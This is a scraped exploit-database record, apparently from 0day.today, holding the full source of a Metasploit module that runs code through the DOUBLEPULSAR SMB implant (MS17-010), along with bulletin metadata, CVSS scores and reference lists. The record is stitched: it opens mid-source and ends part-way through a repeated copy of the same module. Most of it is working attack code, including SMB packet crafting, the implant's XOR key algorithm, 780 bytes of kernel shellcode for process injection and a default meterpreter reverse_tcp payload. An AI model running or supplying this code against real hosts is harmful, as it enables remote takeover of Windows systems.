Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-14] #"}, "lastseen": "2021-09-13T22:19:18", "differentElements": ["sourceData"], "edition": 16}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "a6a6151c5c75d5c2fec3ea8760111a8b", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-14T22:19:49", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-29702", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96709", "SMNTC-96704", "SMNTC-96705", "SMNTC-96703", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-14T22:19:49", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-14T22:19:49", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def 